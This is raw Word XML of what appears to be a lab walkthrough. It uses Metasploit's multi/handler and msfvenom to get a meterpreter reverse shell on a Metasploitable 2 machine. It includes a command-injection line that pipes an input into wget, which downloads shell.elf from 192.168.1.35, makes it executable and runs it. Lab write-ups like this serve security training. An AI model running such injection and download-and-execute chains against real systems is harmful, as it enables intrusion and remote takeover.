    <w:p w14:paraId="0270F396" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="4D3B430F" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="0CCA49C2" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRPr="00523986" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="23390C32" w14:textId="7521A3D9" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:t>Launch Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E95A697" w14:textId="63DA1EE7" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00A87FAB" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34987CD6" wp14:editId="5937391A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>12838</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3843081" cy="3737113"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="31451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17092" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3843081" cy="3737113"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E24D330" w14:textId="07625EC3" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="55C6943B" w14:textId="66465817" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="3E317353" w14:textId="7ED2649F" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="0A221378" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="58518DAD" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="4BB510B2" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="7C4E5740" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="7DD8DEB0" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="5EC679A6" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="49958FBA" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="64755FCD" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="5B535F2E" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="0379401F" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="014CE418" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="43791320" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="1BA625AD" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="31BBBFC0" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="4FA17407" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="44F614CA" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="1E19D5F8" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="03606FAA" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="493E72A5" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRPr="00523986" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="6476233D" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="2332D811" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="7097D625" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="0BFF3EB5" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="2F8D63D2" w14:textId="213B0224" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="46F0B94D" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRPr="00523986" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="0199AC43" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="7F72401B" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:lastRenderedPageBreak/>
        <w:t>Use the exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D124DBC" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08C9DEBC" wp14:editId="4372901D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4363059" cy="619211"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="200602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27773" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4363059" cy="619211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="223D0954" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="1A9BA1CD" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="5F9AF77C" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="57152ADC" w14:textId="5F42C3F6" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D0F7CC2" wp14:editId="48DC10BC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>319405</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5049078" cy="1037821"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="91903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39712" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5049078" cy="1037821"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00523986">
        <w:t>Set the payload and other options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621A1974" w14:textId="52DF656C" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="1E4F67AF" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="674977AB" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="2F6CAC3F" w14:textId="77777777" w:rsidR="00205414" w:rsidRDefault="00205414" w:rsidP="00634134"/>
    <w:p w14:paraId="0A6A77D1" w14:textId="77777777" w:rsidR="00205414" w:rsidRPr="00523986" w:rsidRDefault="00205414" w:rsidP="00634134"/>
    <w:p w14:paraId="0880C5D3" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="4F31D5F1" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="45E9516C" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523986">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve"> to generate reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E57208" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7141C472" wp14:editId="6AB279FE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8587</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="943610"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapNone/>
            <wp:docPr id="38484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43434"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943610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57544F8F" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="600F1BAC" w14:textId="77777777" w:rsidR="00FE1BBF" w:rsidRDefault="00FE1BBF" w:rsidP="00634134"/>
    <w:p w14:paraId="70893CD3" w14:textId="77777777" w:rsidR="00FE1BBF" w:rsidRPr="00523986" w:rsidRDefault="00FE1BBF" w:rsidP="00634134"/>
    <w:p w14:paraId="587CF2B2" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="4C777705" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="1E1DEB49" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:t>Host the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD81BA5" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="22590637" wp14:editId="4C50418D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-2098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2876951" cy="495369"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="86960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06248" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2876951" cy="495369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A977C4" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="45644031" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="31FF752A" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:t>Enter the following to trigger and create meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303E8C2C" w14:textId="50250627" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve">127.0.0.1 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523986">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve"> http://192.168.1.35/shell.elf | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523986">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve"> +x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523986">
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523986">
        <w:t xml:space="preserve"> | ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523986">
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A944B80" w14:textId="7031D22E" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56214D55" w14:textId="42592C4A" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00FE1BBF" w:rsidP="00634134">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3DEF9956" wp14:editId="6FDCA058">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>21590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3578087" cy="1990712"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="10160"/>
            <wp:wrapNone/>
            <wp:docPr id="106479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91231" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3578087" cy="199071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6A09BEE" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="6A8AE26F" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="6D1DA885" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="25D6DB3F" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="3EA5CD23" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="79BB9BF7" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="2D5B5448" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="23BD2A3F" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="2B0A6F6E" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="68872DFA" w14:textId="77777777" w:rsidR="00FE1BBF" w:rsidRDefault="00FE1BBF" w:rsidP="00634134"/>
    <w:p w14:paraId="68EFE44D" w14:textId="77777777" w:rsidR="00FE1BBF" w:rsidRDefault="00FE1BBF" w:rsidP="00634134"/>
    <w:p w14:paraId="30FA0F1C" w14:textId="77777777" w:rsidR="00FE1BBF" w:rsidRDefault="00FE1BBF" w:rsidP="00634134"/>
    <w:p w14:paraId="39727325" w14:textId="77777777" w:rsidR="00FE1BBF" w:rsidRDefault="00FE1BBF" w:rsidP="00634134"/>
    <w:p w14:paraId="4A619FCF" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="1E3CA1AA" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:lastRenderedPageBreak/>
        <w:t>Meterpreter session created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1712CBF4" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70D3C993" wp14:editId="2FEE1E99">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6543</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5534108" cy="1316124"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="102571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17701" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5534108" cy="1316124"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47271746" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="41B4A4C8" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="4A226A04" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="16C4B9C8" w14:textId="77777777" w:rsidR="006A7DB5" w:rsidRDefault="006A7DB5" w:rsidP="00634134"/>
    <w:p w14:paraId="72754EE9" w14:textId="77777777" w:rsidR="006A7DB5" w:rsidRDefault="006A7DB5" w:rsidP="00634134"/>
    <w:p w14:paraId="405E14E5" w14:textId="77777777" w:rsidR="006A7DB5" w:rsidRPr="00523986" w:rsidRDefault="006A7DB5" w:rsidP="00634134"/>
    <w:p w14:paraId="254A01BB" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="23313A74" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="329C2D9D" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:t>We can verify that we now have access to Metasploitable 2 machine by entering hostname in the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E9FBA" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
